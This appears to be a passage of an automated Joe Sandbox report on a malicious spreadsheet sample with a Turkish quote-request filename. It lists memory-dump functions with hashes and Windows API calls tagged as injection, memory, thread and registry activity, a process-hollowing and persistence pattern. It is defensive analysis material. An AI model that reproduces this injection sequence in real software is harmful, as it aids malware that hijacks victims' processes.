2439->2423 2450 3111d21-3111d26 2439->2450 2440->2423 2441->2423 2442->2423 2443->2423 2444->2449 2445->2423 2446->2423 2447->2423 2452 3111c79-3111c7e 2447->2452 2448->2434 2455 3111bc4-3111bc7 2448->2455 2449->2423 2450->2423 2452->2423 2454->2423 2455->2423 2459 3111e75-3111e82 2457->2459 2458->2423 2459->2423
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $"
                                                  • API String ID: 0-3817095088
                                                  • Opcode ID: 896d9c3105e669c9bc7854787d7534b11bd6864143fc87b8e704e90028afbeac
                                                  • Instruction ID: 03ce263fa4bab01dfdbee41ff22ded9c5da0ec2d546b4a0773ae41fd76de72dc
                                                  • Opcode Fuzzy Hash: 896d9c3105e669c9bc7854787d7534b11bd6864143fc87b8e704e90028afbeac
                                                  • Instruction Fuzzy Hash: 7361E6B490021ADFEF14CFA5D8847EEFBF0BB48304F159239C106EA290E7B95595CB29
                                                  Function 03111D8B Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $!
                                                  • API String ID: 0-2056089098
                                                  • Opcode ID: 5439e5cd4af22aa3b5fade50e2b06ba623c28415cfd7f1b92eb92ba38fd37d48
                                                  • Instruction ID: 24c7c18616def3c2a590fc8896e70ea0840f854a0ee5665c9c19e04e15d7c8d8
                                                  • Opcode Fuzzy Hash: 5439e5cd4af22aa3b5fade50e2b06ba623c28415cfd7f1b92eb92ba38fd37d48
                                                  • Instruction Fuzzy Hash: F961D7B490421ADFEF14CFA5D8847EEFBF0BB48304F155239C106EA290E7B95595CB29
                                                  Function 057EF380 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$paq
                                                  • API String ID: 0-4101361271
                                                  • Opcode ID: 19d0f75cb27449c75fb2c19345b7a3129e9e17239546efebdcb19b29f5fef5da
                                                  • Instruction ID: 0bbb4437715ce5a236078af5f52334130d1c79beb04b3a6308d32903c8f03200
                                                  • Opcode Fuzzy Hash: 19d0f75cb27449c75fb2c19345b7a3129e9e17239546efebdcb19b29f5fef5da
                                                  • Instruction Fuzzy Hash: 3541E8706403058FC704DF69D940AAEBBBBFF89300F14892DC44997665DB78E906C7A1
                                                  Function 05E02D25 Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$D
                                                  • API String ID: 0-1610490911
                                                  • Opcode ID: aff289ff28efe57716d4f758590d39813e2a0d91fd669263094c8ff70783ed38
                                                  • Instruction ID: 3978aadaa2b8caaf8abf6b53b0128198d3cdfe9c41c85758bb343ac832f03433
                                                  • Opcode Fuzzy Hash: aff289ff28efe57716d4f758590d39813e2a0d91fd669263094c8ff70783ed38
                                                  • Instruction Fuzzy Hash: 1741C2B4906269CFDBA4CF59D888BEDB6F1BB48314F54A0E6D149B3280D7744AC4CF15
                                                  Function 05E02F0B Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $C
                                                  • API String ID: 0-3643895422
                                                  • Opcode ID: ce700189910986912ad9da37c733d92cdd7047c9fdd0f421ca4bd81d77840a14
                                                  • Instruction ID: 8ea5dcfdb54d088bf5324b94abe455a84a79f975cc9a9faa256fdaa62f7af56d
                                                  • Opcode Fuzzy Hash: ce700189910986912ad9da37c733d92cdd7047c9fdd0f421ca4bd81d77840a14
                                                  • Instruction Fuzzy Hash: 9741E475905229CFDBA0CF59D888BE9B7F1BB09314F50A0E6D149B3280D7744AC4CF15
                                                  Function 05760002 Relevance: 2.6, Strings: 1, Instructions: 1347COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061256251.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5760000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: a7dafe209a802869978ec7e0349a1ae38da9f1ea26b42b3d77d6baa23cbd8750
                                                  • Instruction ID: 1188be4fface47ecf068d6cf7db99d34eec23469123c522eab9f384494acdd25
                                                  • Opcode Fuzzy Hash: a7dafe209a802869978ec7e0349a1ae38da9f1ea26b42b3d77d6baa23cbd8750
                                                  • Instruction Fuzzy Hash: 96B28A7055E385AFD3278B748C69B9A3FB5AF03301F1984DBE580DB2E3C6685848D762
                                                  Function 057E724E Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: I$i
                                                  • API String ID: 0-1166825223
                                                  • Opcode ID: b124a4bdc0c3507d6134e7ae59d1aa232649f2d064bff671399f01151f4fc09e
                                                  • Instruction ID: 01641905c196f98cf11120774902a43ec08dbf133980107b288c3e15aa00bd3f
                                                  • Opcode Fuzzy Hash: b124a4bdc0c3507d6134e7ae59d1aa232649f2d064bff671399f01151f4fc09e
                                                  • Instruction Fuzzy Hash: 0B01BDB0905328CFDB62CF64D888BEEBFB2AB0D311F14519AD409A2281CB751AC4DF45
                                                  Function 05AD44D6 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S$f
                                                  • API String ID: 0-3296881712
                                                  • Opcode ID: 1ef3f68df53d34da9453f33da71330ac6151d163b8c09735f722db05f640bdf4
                                                  • Instruction ID: 13ca8f6e8161c0ebeb7601dc333e165bf00dc88cc28fcf44a4af17dcaed95cf6
                                                  • Opcode Fuzzy Hash: 1ef3f68df53d34da9453f33da71330ac6151d163b8c09735f722db05f640bdf4
                                                  • Instruction Fuzzy Hash: CDF0E274C05269CFDB20DF14D948BAABBB2FB09301F1041E8E40EA7254D7744E85CF66
                                                  Function 05AD13A9 Relevance: 2.5, Strings: 2, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: S$f
                                                  • API String ID: 0-3296881712
                                                  • Opcode ID: 4d90708961594e0b34b746e50de57bacb7d02383b5c766788c766d4d54760d15
                                                  • Instruction ID: 7ccc79f0793e63943d265858a2d3f410eb7043c25a1db28d1ff7cd4f4e64507e
                                                  • Opcode Fuzzy Hash: 4d90708961594e0b34b746e50de57bacb7d02383b5c766788c766d4d54760d15
                                                  • Instruction Fuzzy Hash: 9CF06C748012698FDB21DF65E998BDABBB2BB08301F0045E9E00EA6264D7755E85CF11
                                                  Function 05AE0040 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq
                                                  • API String ID: 0-3092978723
                                                  • Opcode ID: d85d64752b8b80301a6a29110265cbb4995f896ba3d0d3c93917a8259a130a70
                                                  • Instruction ID: aef27a906f841ab94e2ad7b2a705379a19f0043c3345b502a1993c741aca693d
                                                  • Opcode Fuzzy Hash: d85d64752b8b80301a6a29110265cbb4995f896ba3d0d3c93917a8259a130a70
                                                  • Instruction Fuzzy Hash: F6522A75A002288FCB24DF69C985BEDBBF6BF88700F1581D9E509A7361DA709D81CF61
                                                  Function 0311F000 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (_]q
                                                  • API String ID: 0-188044275
                                                  • Opcode ID: 4b8ad886696ead27b4430eea1f7f46f326cc3d609c170c9128426f4d2150a6d8
                                                  • Instruction ID: f9811b9411cc801ae08fb5904fa9ece5b21dda3612c13aa3c5d67d649a77eed5
                                                  • Opcode Fuzzy Hash: 4b8ad886696ead27b4430eea1f7f46f326cc3d609c170c9128426f4d2150a6d8
                                                  • Instruction Fuzzy Hash: 5B228E75B102149FCB04DFA9D490AADB7B2FF88700F158169E905EB3A5DB75EC82CB60
                                                  Function 05B156ED Relevance: 1.8, APIs: 1, Instructions: 267processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05B1595F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 065f01f5c1aa4ef6c9c06b737d18a38824815834e88ca1b8a6d92cde0ac9a965
                                                  • Instruction ID: 2bf2987efc5e759d8de6ac3f19d607227565fa3920c44613564340cc333bcf31
                                                  • Opcode Fuzzy Hash: 065f01f5c1aa4ef6c9c06b737d18a38824815834e88ca1b8a6d92cde0ac9a965
                                                  • Instruction Fuzzy Hash: 81A103B0D002188FDB60CFA9C885BEDBBF1FF49300F5491A9E859A7280DB74A985CF55
                                                  Function 05B156F8 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05B1595F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 0fec8451f8876cc0b97d355a47516a3c412c382dadd3bb9b8a2d2cf6053d9ebc
                                                  • Instruction ID: b851415d625dd44da956b99c5eace39f615e7875586bb933275b9f42af83ff6b
                                                  • Opcode Fuzzy Hash: 0fec8451f8876cc0b97d355a47516a3c412c382dadd3bb9b8a2d2cf6053d9ebc
                                                  • Instruction Fuzzy Hash: ACA102B0D002188FDB60CFA9C885BEDBBF1FF49310F5491A9E859A7280DB74A985CF55
                                                  Function 05B17EDC Relevance: 1.7, APIs: 1, Instructions: 173fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05B18063
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CopyFile
                                                  • String ID:
                                                  • API String ID: 1304948518-0
                                                  • Opcode ID: 78354782eab23f4dd34712ba6c0e15980288d9d8bd445fe96a89b006cdf28280
                                                  • Instruction ID: 88503b51d8d4fae59ec4778d8e8538f248fc74ff7313b0771f5019b5f8ca886d
                                                  • Opcode Fuzzy Hash: 78354782eab23f4dd34712ba6c0e15980288d9d8bd445fe96a89b006cdf28280
                                                  • Instruction Fuzzy Hash: 9E611470D00258DFDB54CFA9C885BEEBBB1FF49304F248169E815A7280DB74A985CF45
                                                  Function 05B17EE8 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05B18063
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: CopyFile
                                                  • String ID:
                                                  • API String ID: 1304948518-0
                                                  • Opcode ID: 1bab9fc7d30b14445c096d8f7c1f8b1d6b16743a50d218202377e601e0ca534a
                                                  • Instruction ID: 3738e1f4cf95cda77160cfafdc4a32585933abb335180bee0b045eefa3433aa4
                                                  • Opcode Fuzzy Hash: 1bab9fc7d30b14445c096d8f7c1f8b1d6b16743a50d218202377e601e0ca534a
                                                  • Instruction Fuzzy Hash: 776103B0D002589FDB54CFA9C8857AEBBB2FF49304F248169E815A7280DB74A985CF45
                                                  Function 05B183BC Relevance: 1.7, APIs: 1, Instructions: 162registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 05B18528
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: dd1e1101bac44b528195a5f8b1fde11e7eade4382ffc8233f42952d4ef02bee5
                                                  • Instruction ID: 32e3ca9406960df4a19317727cc3468693c77926fa18e5f7b3e832e918a78f53
                                                  • Opcode Fuzzy Hash: dd1e1101bac44b528195a5f8b1fde11e7eade4382ffc8233f42952d4ef02bee5
                                                  • Instruction Fuzzy Hash: 5C51FEB4D002189FDB10CFA9D885BAEBBB1FF09300F14906AE819B7250DB74A985CF84
                                                  Function 05B183C8 Relevance: 1.7, APIs: 1, Instructions: 157registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,?,?), ref: 05B18528
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: b92d2b63b76a279e361bf27051b04080d67bda08c37789790ebd35a81790dea5
                                                  • Instruction ID: adbc17952be39fd4342ec65430dff81bacd27385a7d98533fbc9dc590eff0662
                                                  • Opcode Fuzzy Hash: b92d2b63b76a279e361bf27051b04080d67bda08c37789790ebd35a81790dea5
                                                  • Instruction Fuzzy Hash: 0C51EEB4D00218DFDB54CFA9D885BAEBBB1FF09300F14906AE819A7250DB74A985CF84
                                                  Function 05AE0ED8 Relevance: 1.6, Strings: 1, Instructions: 400COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q
                                                  • API String ID: 0-1007455737
                                                  • Opcode ID: 118f0bea50f449bc125c6deacaefec9c2a6eef29b2b55173184bac8933a10baf
                                                  • Instruction ID: 4fe2d708054316e1cdec200acc16bc452382769f7cdbb27b9d895db34d933891
                                                  • Opcode Fuzzy Hash: 118f0bea50f449bc125c6deacaefec9c2a6eef29b2b55173184bac8933a10baf
                                                  • Instruction Fuzzy Hash: 50E1CFB0B042128FDB64EF69C454A7E7AB2BFA5700F14403EE596CB3A5DA38CC42D761
                                                  Function 05B18184 Relevance: 1.6, APIs: 1, Instructions: 143registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 05B182B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 37246d52ae84c9455f64f14915bdf7621a058adae73982c6152176c913d84d1d
                                                  • Instruction ID: 2155d6c323d1238f3386e1c7fbd20747634b0d3d021dbd36f0f7c8a21a0865bc
                                                  • Opcode Fuzzy Hash: 37246d52ae84c9455f64f14915bdf7621a058adae73982c6152176c913d84d1d
                                                  • Instruction Fuzzy Hash: 0551F0B4D00248DFCF10CFA9D984A9EBBF1FF09300F24906AE819AB250D734A985CF95
                                                  Function 05B18190 Relevance: 1.6, APIs: 1, Instructions: 140registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(?,?,?,?,?), ref: 05B182B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 0b046f2cbc89ea98cd6cb993102d0adcfed9b0a094d6ebd0cd06d3087439d93d
                                                  • Instruction ID: 24a259578d4e38d665e65bdc9943cb560e042f2678ad848bf625efef291cf0bf
                                                  • Opcode Fuzzy Hash: 0b046f2cbc89ea98cd6cb993102d0adcfed9b0a094d6ebd0cd06d3087439d93d
                                                  • Instruction Fuzzy Hash: C251DFB4D002089FDB54CFA9D984A9EBBF1FF09300F24906AE819AB250D774A981CF95
                                                  Function 05B16169 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05B16243
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 7445839ad6ae9b5ad4601bcf1e473a3179b9db8e078153a0e6999fae73e44ab4
                                                  • Instruction ID: 587c7a21f274d757a1a29e9ac4c43c4338c19c749f0621610d9484a8827f7f75
                                                  • Opcode Fuzzy Hash: 7445839ad6ae9b5ad4601bcf1e473a3179b9db8e078153a0e6999fae73e44ab4
                                                  • Instruction Fuzzy Hash: 4A419AB5D012589FCB00CFA9D984AEEFBF1BB49310F14902AE819B7210D735AA45CBA4
                                                  Function 05B16170 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05B16243
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: e8cd384116e227378541a2f091a353969bbb4f9c37f49dda4b94698b07957be3
                                                  • Instruction ID: c028208cd0b803d1a7e7b74e6af8afa42f9ebcaf569a952d12373e6dfc44fbc2
                                                  • Opcode Fuzzy Hash: e8cd384116e227378541a2f091a353969bbb4f9c37f49dda4b94698b07957be3
                                                  • Instruction Fuzzy Hash: 30419BB5D012589FCF00CFA9D984ADEFBF1BF49310F10902AE819B7210D735A945CB64
                                                  Function 05B16008 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B160BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: ac521951dfb08742d96ceafb3f1e1818d45e8c119e2a24621c1bb45e2e1c4965
                                                  • Instruction ID: 661d405c5581eddfa05fb3271a18128f2e9e511c7fdc3dcf4ccaaa0de48f974f
                                                  • Opcode Fuzzy Hash: ac521951dfb08742d96ceafb3f1e1818d45e8c119e2a24621c1bb45e2e1c4965
                                                  • Instruction Fuzzy Hash: A53178B9D002589FCF10CFA9D985A9EFBB5FB49310F10942AE815B7210D735A946CF68
                                                  Function 05B16658 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B16704
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 66e1b901a35deb104a5b49ea776e52b4b6fe0d5227dcba716fa97ff371359089
                                                  • Instruction ID: 07370c0d3bafe8b890c0cafc039737cb7f787e6c4e8569fc7e36fcb224c743c1
                                                  • Opcode Fuzzy Hash: 66e1b901a35deb104a5b49ea776e52b4b6fe0d5227dcba716fa97ff371359089
                                                  • Instruction Fuzzy Hash: 2231B9B9D002589FCB10CFAAD980AEEFBB1BF49310F14906AE815B7210D739A945CF64
                                                  Function 05B16010 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B160BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: bab740cb08496cd62a5f03b756794a1c78281aabb503f1f531c885792fc6b287
                                                  • Instruction ID: 444c1e0034f7858435a429b1c75de204313d0105f095e3c81ce2688e0d550fac
                                                  • Opcode Fuzzy Hash: bab740cb08496cd62a5f03b756794a1c78281aabb503f1f531c885792fc6b287
                                                  • Instruction Fuzzy Hash: 743187B9D002589FCF10CFA9D984A9EFBB5FF49310F10942AE815B7210D735A945CFA8
                                                  Function 05B16660 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B16704
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 3cbdde3a2d5c991fc6995b76925e98e253dcc2e66df08542d25ffa18c0cfa966
                                                  • Instruction ID: 9bf53a26811900a59e322e62b3ea8601824a1e84dff29beaa1833887b00efed7
                                                  • Opcode Fuzzy Hash: 3cbdde3a2d5c991fc6995b76925e98e253dcc2e66df08542d25ffa18c0cfa966
                                                  • Instruction Fuzzy Hash: B931CAB9D00258DFCB10CFAAD580AEEFBB1BF09310F10906AE815B7210D739A945CF64
                                                  Function 05B15AA8 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B15B5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062894780.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5b10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 098423763b03a37857b5bf60f7fac5fd00505bbc03a9317100ad390cb2b9eb83
                                                  • Instruction ID: 8db95cc38185bb3d4d5648c5338b19e111f31763d0ed23f7720042e58de58c8a
